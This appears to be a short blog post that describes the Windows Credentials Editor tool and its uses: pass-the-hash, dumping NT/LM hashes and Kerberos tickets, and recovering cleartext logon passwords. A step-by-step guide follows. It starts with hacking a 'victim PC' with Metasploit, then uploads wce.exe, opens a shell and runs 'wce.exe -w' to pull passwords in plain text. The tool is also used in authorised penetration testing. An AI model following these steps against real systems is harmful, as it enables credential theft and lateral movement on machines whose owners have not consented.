Windows Credentials Editor (WCE) is a security tool that allows to list logon sessions and
add, change, list and delete associated credentials (ex.: LM/NT hashes,
plaintext passwords and Kerberos tickets). This tool can be used, for example,
to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from
interactive logons, services, remote desktop connections, etc.), obtain
Kerberos tickets and reuse them in other Windows or Unix systems and dump
cleartext passwords entered by users at logon. WCE is a security tool widely
used by security professionals to assess the security of Windows networks via
Penetration Testing. It supports Windows XP, 2003, Vista, 7 and 2008.
First Hack the Victim PC Using Metasploit
Step 1: Now upload the wce.exe in victim pc using
Upload /pentest/passwords/wce/wce.exe .
Step 2:
type shell to get the command prompt
of victim pc
Step 3: now
use wce.exe –w command to get
password in text form
No comments:
Post a Comment